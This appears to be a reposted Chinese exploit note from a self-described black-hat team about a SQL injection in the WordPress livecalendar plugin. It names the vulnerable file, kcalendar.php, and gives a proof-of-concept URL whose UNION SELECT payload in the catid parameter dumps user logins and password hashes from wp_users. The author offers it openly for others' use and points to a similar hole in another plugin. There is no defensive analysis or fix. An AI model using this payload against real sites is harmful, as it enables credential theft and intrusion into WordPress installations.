Wordpress plugin livecalendar SQL injection

admin 2021年4月3日20:07:38评论43 views字数 622阅读2分4秒阅读模式

/****************************************************
*     Wordpress plugin livecalendar SQL injection
*     From WwW.bhst.OrG Black-Hat Security Team
*     Author LengF              Contact:81sec.com
****************************************************/

漏洞文件:

wp-content/plugins/livecalendar/kcalendar.php

POC:

http://hackit.com/wp-content/plu ... th=10&catid=-1/**/union/**/select/**/user_login,user_pass/**/from wp_users/*

    这个injection比较低级,不过这个插件貌似网上很难找到。分享给大家,兴许没太大作用,当然了wordpress一般只能从插件入手了。另外还有一个插件count-per-day也存在类似的注入。有时候wordpress注入还是比较鸡肋的,因为经常密码破解不出来,当然了,权限够大另当别论了。

    本文没啥分析的,呵呵

    by LengF

文章来源于lcx.cc:Wordpress plugin livecalendar SQL injection

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日20:07:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Wordpress plugin livecalendar SQL injectionhttps://cn-sec.com/archives/325643.html

发表评论

匿名网友 填写信息